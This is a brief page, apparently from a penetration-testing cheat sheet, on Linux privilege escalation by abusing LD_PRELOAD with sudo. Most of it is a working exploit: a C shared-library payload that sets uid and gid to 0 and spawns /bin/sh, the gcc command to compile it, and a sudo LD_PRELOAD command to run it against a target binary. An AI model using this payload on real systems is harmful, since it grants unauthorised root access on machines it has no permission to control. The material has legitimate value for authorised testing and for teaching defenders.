Path Hijacking

LD_PRELOAD
Check if you can write into the path of privileged binaries, you might be able to abuse the library load order. Check wich functions a binary uses via objectdump -T. To use these preload attacks with sudo in /etc/sudoers there must be env_keep += LD_PRELOAD
Preload example payload
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
  unsetenv("LD_PRELOAD");
  setgid(0);
  setuid(0);
  system("/bin/sh");
}
Compile preload example payload
gcc -fPIC -shared -o payload.so payload.c -nostartfiles
sudo LD_PRELOAD=/tmp/payload.so <target>
When playing with the linker configs run ldconfig afterwards or it wont update the linker cache.
GDB
Templates
Last modified 6mo ago